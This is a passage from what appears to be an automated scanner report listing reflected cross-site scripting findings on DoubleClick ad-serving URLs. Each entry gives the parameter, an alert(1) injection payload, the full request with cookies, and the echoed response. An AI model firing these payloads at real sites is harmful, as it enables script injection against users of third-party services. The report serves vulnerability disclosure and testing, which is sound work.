User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABKtKkgA==A-aWrFdouoM2KET|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCwYc=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: u="aABnA6AkA==AI89bBrQ==AAABLzpCwYY=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: f="aAB1tgxqQ==AK1302352544AB1AAABLzpCwYU=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: s="aACeHA9_w==AE9479AN1294103956000AAABLzpCwYU=AE8438AN1275963655000AAABLzpCwYU=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:44 GMT
Set-Cookie: a=c369295169464782579;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Set-Cookie: j=c369295169464782579;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-RvuhyLCM5c93;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Set-Cookie: p=1-RvuhyLCM5c93;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352544134;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:44 GMT
Content-Length: 2847

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352544133;click=h
...[SNIP]...
' border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=12387&aa=9530,84152,12352,361230,824,10261,WrFdouoM2KET,http%3A%2F%2Frocketfuelinc.com,492,1249,38387,1279,6613&pa=ppre35252550824788e8f'><script>alert(1)</script>2f874ec50da&id=&ra=3525441350.3508423759469188'>
...[SNIP]...
1.6. http://ad.doubleclick.net/adi/fnc/root/stocksearch [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/fnc/root/stocksearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85b07"style%3d"x%3aexpression(alert(1))"b41c0a38777 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85b07"style="x:expression(alert(1))"b41c0a38777 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?&85b07"style%3d"x%3aexpression(alert(1))"b41c0a38777=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 574

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/y;235228619;0-0;1;22676449;21-88/31;40472641/40490428/1;;~okv=;pos=stocksearch;fnc=ad;sz=88x31;;85b07"style="x:expression(alert(1))"b41c0a38777=1;~aopt=2/1/8b/0;~sscs=%3fhttp://ad.doubleclick.net/clk;235657212;58880944;s">
...[SNIP]...
1.7. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa07e"-alert(1)-"aeaa2972497 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&aa07e"-alert(1)-"aeaa2972497=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:36:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7011

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&aa07e"-alert(1)-"aeaa2972497=1http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167480");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "neve
...[SNIP]...
1.8. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 115ba'-alert(1)-'12c0aaa9aad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&115ba'-alert(1)-'12c0aaa9aad=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:36:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7011

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX&115ba'-alert(1)-'12c0aaa9aad=1http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167480\">
...[SNIP]...
1.9. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4c81"-alert(1)-"532b4a5b9ac was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXa4c81"-alert(1)-"532b4a5b9ac HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:35:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6969

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
00/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXa4c81"-alert(1)-"532b4a5b9achttp://www.devry.edu/degree-programs/colleges-overview.jsp?vc=167480");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...
1.10. http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.rocketfuelincOX15601/B4639841.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdf1b'-alert(1)-'b9757c6ddd4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529146;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXcdf1b'-alert(1)-'b9757c6ddd4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:35:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6969

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
00/250%3B37372498/37390376/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLGMwbGR4VExfQ053YixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXcdf1b'-alert(1)-'b9757c6ddd4http://www.devry.edu/degree-programs/colleges-overview.jsp?vc=167480\">
...[SNIP]...
1.11. http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010 [net parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2addd'%3balert(1)//0280304bd4f was submitted in the net parameter. This input was echoed as 2addd';alert(1)//0280304bd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;net=2addd'%3balert(1)//0280304bd4f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 400
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:51 GMT
Expires: Mon, 11 Apr 2011 16:21:51 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/p;239769129;2-0;0;46850814;255-0/0;41621127/41638914/1;;~okv=;net=2addd';alert(1)//0280304bd4f;~aopt=2/1/e4/0;~sscs=%3fhttps://mastercard.choicepay.com/mcfed/mastercard6.jsp">
...[SNIP]...
1.12. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/detail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/detail

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99899'-alert(1)-'228a68fc46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.hearsttv.wptz/detail99899'-alert(1)-'228a68fc46;kw=containerlinkswelike;pos=1;sz=253x300;ord=4697446210775524? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:31:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1289

document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n    <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n        ');

docu
...[SNIP]...
<scr'+'ipt type="text/javascript" src="http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail99899'-alert(1)-'228a68fc46;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=6865167?">
...[SNIP]...
1.13. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/index

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26096'-alert(1)-'66ba3d012db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

